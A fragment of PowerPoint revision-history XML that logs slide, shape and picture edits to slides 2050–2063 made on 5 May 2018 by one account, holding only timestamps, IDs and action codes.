        <pc:chgData name="secureideas@outlook.com" userId="9bce01ac66c2b4c7" providerId="LiveId" clId="{17884CF8-C05E-459D-92A9-2AA72DE877B1}" dt="2018-05-05T02:21:58.451" v="762" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="435306361" sldId="2050"/>
        </pc:sldMkLst>
        <pc:spChg chg="add del mod">
          <ac:chgData name="secureideas@outlook.com" userId="9bce01ac66c2b4c7" providerId="LiveId" clId="{17884CF8-C05E-459D-92A9-2AA72DE877B1}" dt="2018-05-05T02:21:43.021" v="757" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="435306361" sldId="2050"/>
            <ac:spMk id="3" creationId="{15133F6D-266D-4AF1-AD79-A44CAB921589}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="secureideas@outlook.com" userId="9bce01ac66c2b4c7" providerId="LiveId" clId="{17884CF8-C05E-459D-92A9-2AA72DE877B1}" dt="2018-05-05T02:19:14.614" v="739" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="435306361" sldId="2050"/>
            <ac:spMk id="8" creationId="{AA50886C-7B80-5D47-B5B6-4240F765D5A5}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="secureideas@outlook.com" userId="9bce01ac66c2b4c7" providerId="LiveId" clId="{17884CF8-C05E-459D-92A9-2AA72DE877B1}" dt="2018-05-05T02:19:25.690" v="740" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="435306361" sldId="2050"/>
            <ac:spMk id="9" creationId="{E35E730E-11B2-2946-BB75-D7E7850AAABC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="secureideas@outlook.com" userId="9bce01ac66c2b4c7" providerId="LiveId" clId="{17884CF8-C05E-459D-92A9-2AA72DE877B1}" dt="2018-05-05T02:19:25.690" v="740" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="435306361" sldId="2050"/>
            <ac:spMk id="11" creationId="{BA740AE6-FD56-BE4D-B17F-6C9C9C1B7750}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="secureideas@outlook.com" userId="9bce01ac66c2b4c7" providerId="LiveId" clId="{17884CF8-C05E-459D-92A9-2AA72DE877B1}" dt="2018-05-05T02:20:48.978" v="754" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="435306361" sldId="2050"/>
            <ac:spMk id="12" creationId="{195686DE-BC8A-6141-8343-D1A1B3EB6686}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="secureideas@outlook.com" userId="9bce01ac66c2b4c7" providerId="LiveId" clId="{17884CF8-C05E-459D-92A9-2AA72DE877B1}" dt="2018-05-05T02:21:39.411" v="755" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="435306361" sldId="2050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18:27.206" v="720" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="435306361" sldId="2050"/>
            <ac:spMk id="14" creationId="{FC558C56-82EF-4859-A6F0-5448863A6471}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="secureideas@outlook.com" userId="9bce01ac66c2b4c7" providerId="LiveId" clId="{17884CF8-C05E-459D-92A9-2AA72DE877B1}" dt="2018-05-05T02:21:58.451" v="762" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="435306361" sldId="2050"/>
            <ac:picMk id="4" creationId="{E3E01808-4F4A-4DD8-8724-53392D03D150}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add">
        <pc:chgData name="secureideas@outlook.com" userId="9bce01ac66c2b4c7" providerId="LiveId" clId="{17884CF8-C05E-459D-92A9-2AA72DE877B1}" dt="2018-05-05T02:27:15.946" v="895"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1432028853" sldId="2051"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="secureideas@outlook.com" userId="9bce01ac66c2b4c7" providerId="LiveId" clId="{17884CF8-C05E-459D-92A9-2AA72DE877B1}" dt="2018-05-05T02:27:15.946" v="895"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1432028853" sldId="2051"/>
            <ac:spMk id="13" creationId="{5B94220D-FD0B-4B97-BDA4-5ABE8FAC5DDC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="del">
          <ac:chgData name="secureideas@outlook.com" userId="9bce01ac66c2b4c7" providerId="LiveId" clId="{17884CF8-C05E-459D-92A9-2AA72DE877B1}" dt="2018-05-05T02:22:16.146" v="764" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1432028853" sldId="2051"/>
            <ac:picMk id="4" creationId="{E3E01808-4F4A-4DD8-8724-53392D03D150}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add">
        <pc:chgData name="secureideas@outlook.com" userId="9bce01ac66c2b4c7" providerId="LiveId" clId="{17884CF8-C05E-459D-92A9-2AA72DE877B1}" dt="2018-05-05T02:29:46.817" v="1021" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3096071650" sldId="2052"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="secureideas@outlook.com" userId="9bce01ac66c2b4c7" providerId="LiveId" clId="{17884CF8-C05E-459D-92A9-2AA72DE877B1}" dt="2018-05-05T02:28:03.995" v="973" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3096071650" sldId="2052"/>
            <ac:spMk id="11" creationId="{BA740AE6-FD56-BE4D-B17F-6C9C9C1B7750}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="secureideas@outlook.com" userId="9bce01ac66c2b4c7" providerId="LiveId" clId="{17884CF8-C05E-459D-92A9-2AA72DE877B1}" dt="2018-05-05T02:29:16.990" v="1015" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3096071650" sldId="2052"/>
            <ac:spMk id="12" creationId="{195686DE-BC8A-6141-8343-D1A1B3EB6686}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod">
          <ac:chgData name="secureideas@outlook.com" userId="9bce01ac66c2b4c7" providerId="LiveId" clId="{17884CF8-C05E-459D-92A9-2AA72DE877B1}" dt="2018-05-05T02:29:40.188" v="1018" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3096071650" sldId="2052"/>
            <ac:spMk id="13" creationId="{5B94220D-FD0B-4B97-BDA4-5ABE8FAC5DDC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="secureideas@outlook.com" userId="9bce01ac66c2b4c7" providerId="LiveId" clId="{17884CF8-C05E-459D-92A9-2AA72DE877B1}" dt="2018-05-05T02:29:35.092" v="1016" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3096071650" sldId="2052"/>
            <ac:spMk id="14" creationId="{FC558C56-82EF-4859-A6F0-5448863A6471}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="secureideas@outlook.com" userId="9bce01ac66c2b4c7" providerId="LiveId" clId="{17884CF8-C05E-459D-92A9-2AA72DE877B1}" dt="2018-05-05T02:29:46.817" v="1021" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3096071650" sldId="2052"/>
            <ac:picMk id="2" creationId="{C6C7CC3F-0D1B-41D7-9065-3908054FA2A0}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add">
        <pc:chgData name="secureideas@outlook.com" userId="9bce01ac66c2b4c7" providerId="LiveId" clId="{17884CF8-C05E-459D-92A9-2AA72DE877B1}" dt="2018-05-05T02:35:09.643" v="1134" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1844209647" sldId="2053"/>
        </pc:sldMkLst>
        <pc:spChg chg="add del">
          <ac:chgData name="secureideas@outlook.com" userId="9bce01ac66c2b4c7" providerId="LiveId" clId="{17884CF8-C05E-459D-92A9-2AA72DE877B1}" dt="2018-05-05T02:30:49.464" v="1029"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1844209647" sldId="2053"/>
            <ac:spMk id="2" creationId="{93452FAF-6849-4A66-9BA8-10B71A020216}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="secureideas@outlook.com" userId="9bce01ac66c2b4c7" providerId="LiveId" clId="{17884CF8-C05E-459D-92A9-2AA72DE877B1}" dt="2018-05-05T02:30:52.363" v="1031"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1844209647" sldId="2053"/>
            <ac:spMk id="3" creationId="{4AB064D4-C599-44DB-B7A1-34368B245444}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="secureideas@outlook.com" userId="9bce01ac66c2b4c7" providerId="LiveId" clId="{17884CF8-C05E-459D-92A9-2AA72DE877B1}" dt="2018-05-05T02:31:20.665" v="1051" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1844209647" sldId="2053"/>
            <ac:spMk id="13" creationId="{5B94220D-FD0B-4B97-BDA4-5ABE8FAC5DDC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="secureideas@outlook.com" userId="9bce01ac66c2b4c7" providerId="LiveId" clId="{17884CF8-C05E-459D-92A9-2AA72DE877B1}" dt="2018-05-05T02:35:09.643" v="1134" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1844209647" sldId="2053"/>
            <ac:spMk id="14" creationId="{FC558C56-82EF-4859-A6F0-5448863A6471}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add">
        <pc:chgData name="secureideas@outlook.com" userId="9bce01ac66c2b4c7" providerId="LiveId" clId="{17884CF8-C05E-459D-92A9-2AA72DE877B1}" dt="2018-05-05T02:30:29.632" v="1027" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1626533087" sldId="2054"/>
        </pc:sldMkLst>
        <pc:picChg chg="del">
          <ac:chgData name="secureideas@outlook.com" userId="9bce01ac66c2b4c7" providerId="LiveId" clId="{17884CF8-C05E-459D-92A9-2AA72DE877B1}" dt="2018-05-05T02:30:21.885" v="1024" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1626533087" sldId="2054"/>
            <ac:picMk id="2" creationId="{C6C7CC3F-0D1B-41D7-9065-3908054FA2A0}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="secureideas@outlook.com" userId="9bce01ac66c2b4c7" providerId="LiveId" clId="{17884CF8-C05E-459D-92A9-2AA72DE877B1}" dt="2018-05-05T02:30:29.632" v="1027" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1626533087" sldId="2054"/>
            <ac:picMk id="3" creationId="{30C276AA-0DD9-4069-B2E6-D7892948F3F1}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add del">
        <pc:chgData name="secureideas@outlook.com" userId="9bce01ac66c2b4c7" providerId="LiveId" clId="{17884CF8-C05E-459D-92A9-2AA72DE877B1}" dt="2018-05-05T02:34:18.292" v="1120" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="344846694" sldId="2055"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="secureideas@outlook.com" userId="9bce01ac66c2b4c7" providerId="LiveId" clId="{17884CF8-C05E-459D-92A9-2AA72DE877B1}" dt="2018-05-05T02:33:10.812" v="1071" actId="207"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="344846694" sldId="2055"/>
            <ac:spMk id="12" creationId="{195686DE-BC8A-6141-8343-D1A1B3EB6686}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="add del">
        <pc:chgData name="secureideas@outlook.com" userId="9bce01ac66c2b4c7" providerId="LiveId" clId="{17884CF8-C05E-459D-92A9-2AA72DE877B1}" dt="2018-05-05T02:31:48.766" v="1053" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3166421209" sldId="2055"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp add">
        <pc:chgData name="secureideas@outlook.com" userId="9bce01ac66c2b4c7" providerId="LiveId" clId="{17884CF8-C05E-459D-92A9-2AA72DE877B1}" dt="2018-05-05T02:34:29.718" v="1122"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3535328631" sldId="2055"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="secureideas@outlook.com" userId="9bce01ac66c2b4c7" providerId="LiveId" clId="{17884CF8-C05E-459D-92A9-2AA72DE877B1}" dt="2018-05-05T02:34:29.718" v="1122"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3535328631" sldId="2055"/>
            <ac:spMk id="13" creationId="{145192F1-FFF3-4AE3-ACE7-E7E60AFACF3A}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add">
        <pc:chgData name="secureideas@outlook.com" userId="9bce01ac66c2b4c7" providerId="LiveId" clId="{17884CF8-C05E-459D-92A9-2AA72DE877B1}" dt="2018-05-05T02:40:38.220" v="1152" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1497427610" sldId="2056"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="secureideas@outlook.com" userId="9bce01ac66c2b4c7" providerId="LiveId" clId="{17884CF8-C05E-459D-92A9-2AA72DE877B1}" dt="2018-05-05T02:35:45.044" v="1145" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1497427610" sldId="2056"/>
            <ac:spMk id="11" creationId="{BA740AE6-FD56-BE4D-B17F-6C9C9C1B7750}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="secureideas@outlook.com" userId="9bce01ac66c2b4c7" providerId="LiveId" clId="{17884CF8-C05E-459D-92A9-2AA72DE877B1}" dt="2018-05-05T02:35:53.993" v="1147"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1497427610" sldId="2056"/>
            <ac:spMk id="12" creationId="{195686DE-BC8A-6141-8343-D1A1B3EB6686}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod">
          <ac:chgData name="secureideas@outlook.com" userId="9bce01ac66c2b4c7" providerId="LiveId" clId="{17884CF8-C05E-459D-92A9-2AA72DE877B1}" dt="2018-05-05T02:40:33.780" v="1150" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1497427610" sldId="2056"/>
            <ac:spMk id="13" creationId="{5B94220D-FD0B-4B97-BDA4-5ABE8FAC5DDC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="secureideas@outlook.com" userId="9bce01ac66c2b4c7" providerId="LiveId" clId="{17884CF8-C05E-459D-92A9-2AA72DE877B1}" dt="2018-05-05T02:40:38.220" v="1152" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1497427610" sldId="2056"/>
            <ac:picMk id="2" creationId="{FB2FD23E-F734-478C-84DC-D5FB2EC01F74}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add">
        <pc:chgData name="secureideas@outlook.com" userId="9bce01ac66c2b4c7" providerId="LiveId" clId="{17884CF8-C05E-459D-92A9-2AA72DE877B1}" dt="2018-05-05T02:41:46.998" v="1173" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3532628259" sldId="2057"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="secureideas@outlook.com" userId="9bce01ac66c2b4c7" providerId="LiveId" clId="{17884CF8-C05E-459D-92A9-2AA72DE877B1}" dt="2018-05-05T02:41:29.205" v="1157"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3532628259" sldId="2057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41:46.998" v="1173" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3532628259" sldId="2057"/>
            <ac:spMk id="14" creationId="{FC558C56-82EF-4859-A6F0-5448863A6471}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="add del">
        <pc:chgData name="secureideas@outlook.com" userId="9bce01ac66c2b4c7" providerId="LiveId" clId="{17884CF8-C05E-459D-92A9-2AA72DE877B1}" dt="2018-05-05T02:40:59.147" v="1154" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4210220032" sldId="2057"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp add">
        <pc:chgData name="secureideas@outlook.com" userId="9bce01ac66c2b4c7" providerId="LiveId" clId="{17884CF8-C05E-459D-92A9-2AA72DE877B1}" dt="2018-05-05T03:14:30.898" v="2224" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1684894443" sldId="2058"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="secureideas@outlook.com" userId="9bce01ac66c2b4c7" providerId="LiveId" clId="{17884CF8-C05E-459D-92A9-2AA72DE877B1}" dt="2018-05-05T03:13:09.187" v="2200" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1684894443" sldId="2058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42:36.351" v="1183" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1684894443" sldId="2058"/>
            <ac:spMk id="14" creationId="{FC558C56-82EF-4859-A6F0-5448863A6471}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="secureideas@outlook.com" userId="9bce01ac66c2b4c7" providerId="LiveId" clId="{17884CF8-C05E-459D-92A9-2AA72DE877B1}" dt="2018-05-05T03:14:30.898" v="2224" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1684894443" sldId="2058"/>
            <ac:picMk id="3" creationId="{F7EDF383-9E4D-42B0-B7EC-90A0DFB43932}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp add">
        <pc:chgData name="secureideas@outlook.com" userId="9bce01ac66c2b4c7" providerId="LiveId" clId="{17884CF8-C05E-459D-92A9-2AA72DE877B1}" dt="2018-05-05T03:13:01.454" v="2198" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4272139386" sldId="2059"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="secureideas@outlook.com" userId="9bce01ac66c2b4c7" providerId="LiveId" clId="{17884CF8-C05E-459D-92A9-2AA72DE877B1}" dt="2018-05-05T03:12:49.518" v="2194" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4272139386" sldId="2059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42:45.741" v="1184" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4272139386" sldId="2059"/>
            <ac:spMk id="14" creationId="{FC558C56-82EF-4859-A6F0-5448863A6471}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="secureideas@outlook.com" userId="9bce01ac66c2b4c7" providerId="LiveId" clId="{17884CF8-C05E-459D-92A9-2AA72DE877B1}" dt="2018-05-05T03:13:01.454" v="2198" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4272139386" sldId="2059"/>
            <ac:picMk id="3" creationId="{74A31067-F534-40FA-9D91-6D5538C6062E}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp add">
        <pc:chgData name="secureideas@outlook.com" userId="9bce01ac66c2b4c7" providerId="LiveId" clId="{17884CF8-C05E-459D-92A9-2AA72DE877B1}" dt="2018-05-05T03:13:36.604" v="2208" actId="27636"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2795567611" sldId="2060"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="secureideas@outlook.com" userId="9bce01ac66c2b4c7" providerId="LiveId" clId="{17884CF8-C05E-459D-92A9-2AA72DE877B1}" dt="2018-05-05T03:13:36.604" v="2208" actId="27636"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2795567611" sldId="2060"/>
            <ac:spMk id="13" creationId="{145192F1-FFF3-4AE3-ACE7-E7E60AFACF3A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="secureideas@outlook.com" userId="9bce01ac66c2b4c7" providerId="LiveId" clId="{17884CF8-C05E-459D-92A9-2AA72DE877B1}" dt="2018-05-05T03:13:33.440" v="2206" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2795567611" sldId="2060"/>
            <ac:picMk id="3" creationId="{D0F087C5-1AA8-4022-890B-2FFD6BC22CD8}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add">
        <pc:chgData name="secureideas@outlook.com" userId="9bce01ac66c2b4c7" providerId="LiveId" clId="{17884CF8-C05E-459D-92A9-2AA72DE877B1}" dt="2018-05-05T03:14:08.209" v="2217" actId="478"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2354967012" sldId="2061"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="secureideas@outlook.com" userId="9bce01ac66c2b4c7" providerId="LiveId" clId="{17884CF8-C05E-459D-92A9-2AA72DE877B1}" dt="2018-05-05T02:43:13.090" v="1194" actId="27636"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2354967012" sldId="2061"/>
            <ac:spMk id="13" creationId="{145192F1-FFF3-4AE3-ACE7-E7E60AFACF3A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="secureideas@outlook.com" userId="9bce01ac66c2b4c7" providerId="LiveId" clId="{17884CF8-C05E-459D-92A9-2AA72DE877B1}" dt="2018-05-05T03:13:54.357" v="2212" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2354967012" sldId="2061"/>
            <ac:picMk id="3" creationId="{56ECD5F0-4C2B-46BF-B358-EFA945C3E8EE}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="secureideas@outlook.com" userId="9bce01ac66c2b4c7" providerId="LiveId" clId="{17884CF8-C05E-459D-92A9-2AA72DE877B1}" dt="2018-05-05T03:14:08.209" v="2217" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2354967012" sldId="2061"/>
            <ac:picMk id="5" creationId="{BFCADF04-7CFE-4113-B623-8F382473B3E2}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add del">
        <pc:chgData name="secureideas@outlook.com" userId="9bce01ac66c2b4c7" providerId="LiveId" clId="{17884CF8-C05E-459D-92A9-2AA72DE877B1}" dt="2018-05-05T06:07:52.432" v="2235" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="747908388" sldId="2062"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="secureideas@outlook.com" userId="9bce01ac66c2b4c7" providerId="LiveId" clId="{17884CF8-C05E-459D-92A9-2AA72DE877B1}" dt="2018-05-05T02:43:42.867" v="1209" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="747908388" sldId="2062"/>
            <ac:spMk id="11" creationId="{BA740AE6-FD56-BE4D-B17F-6C9C9C1B7750}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="secureideas@outlook.com" userId="9bce01ac66c2b4c7" providerId="LiveId" clId="{17884CF8-C05E-459D-92A9-2AA72DE877B1}" dt="2018-05-05T02:44:24.063" v="1254" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="747908388" sldId="2062"/>
            <ac:spMk id="12" creationId="{195686DE-BC8A-6141-8343-D1A1B3EB6686}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="secureideas@outlook.com" userId="9bce01ac66c2b4c7" providerId="LiveId" clId="{17884CF8-C05E-459D-92A9-2AA72DE877B1}" dt="2018-05-05T02:46:11.043" v="1437" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="747908388" sldId="2062"/>
            <ac:spMk id="13" creationId="{145192F1-FFF3-4AE3-ACE7-E7E60AFACF3A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="secureideas@outlook.com" userId="9bce01ac66c2b4c7" providerId="LiveId" clId="{17884CF8-C05E-459D-92A9-2AA72DE877B1}" dt="2018-05-05T02:44:40.234" v="1266" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="747908388" sldId="2062"/>
            <ac:spMk id="14" creationId="{FC558C56-82EF-4859-A6F0-5448863A6471}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add del">
        <pc:chgData name="secureideas@outlook.com" userId="9bce01ac66c2b4c7" providerId="LiveId" clId="{17884CF8-C05E-459D-92A9-2AA72DE877B1}" dt="2018-05-05T06:07:46.889" v="2234" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="224186335" sldId="2063"/>
        </pc:sldMkLst>
        <pc:spChg chg="add del mod">
          <ac:chgData name="secureideas@outlook.com" userId="9bce01ac66c2b4c7" providerId="LiveId" clId="{17884CF8-C05E-459D-92A9-2AA72DE877B1}" dt="2018-05-05T02:47:27.829" v="1442" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="224186335" sldId="2063"/>
            <ac:spMk id="4" creationId="{EE1B7FF3-2FF1-4112-A506-DB75F85F15F8}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="secureideas@outlook.com" userId="9bce01ac66c2b4c7" providerId="LiveId" clId="{17884CF8-C05E-459D-92A9-2AA72DE877B1}" dt="2018-05-05T02:47:25.096" v="1441" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="224186335" sldId="2063"/>
            <ac:spMk id="13" creationId="{145192F1-FFF3-4AE3-ACE7-E7E60AFACF3A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add del">
          <ac:chgData name="secureideas@outlook.com" userId="9bce01ac66c2b4c7" providerId="LiveId" clId="{17884CF8-C05E-459D-92A9-2AA72DE877B1}" dt="2018-05-05T02:47:44.078" v="1445" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="224186335" sldId="2063"/>
            <ac:picMk id="2" creationId="{7F9FF638-705B-44DE-A17A-EF0E2E19E6EC}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del">
          <ac:chgData name="secureideas@outlook.com" userId="9bce01ac66c2b4c7" providerId="LiveId" clId="{17884CF8-C05E-459D-92A9-2AA72DE877B1}" dt="2018-05-05T02:47:43.260" v="1444" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="224186335" sldId="2063"/>
            <ac:picMk id="5" creationId="{8BFFD27A-A24E-4F8D-BA57-293AC1017468}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="secureideas@outlook.com" userId="9bce01ac66c2b4c7" providerId="LiveId" clId="{17884CF8-C05E-459D-92A9-2AA72DE877B1}" dt="2018-05-05T02:48:01.844" v="1448" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="224186335" sldId="2063"/>
            <ac:picMk id="6" creationId="{88F6537D-DD2E-49C0-A1B2-8DD11D9C836C}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="add del">
        <pc:chgData name="secureideas@outlook.com" userId="9bce01ac66c2b4c7" providerId="LiveId" clId="{17884CF8-C05E-459D-92A9-2AA72DE877B1}" dt="2018-05-05T02:48:14.474" v="1451" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
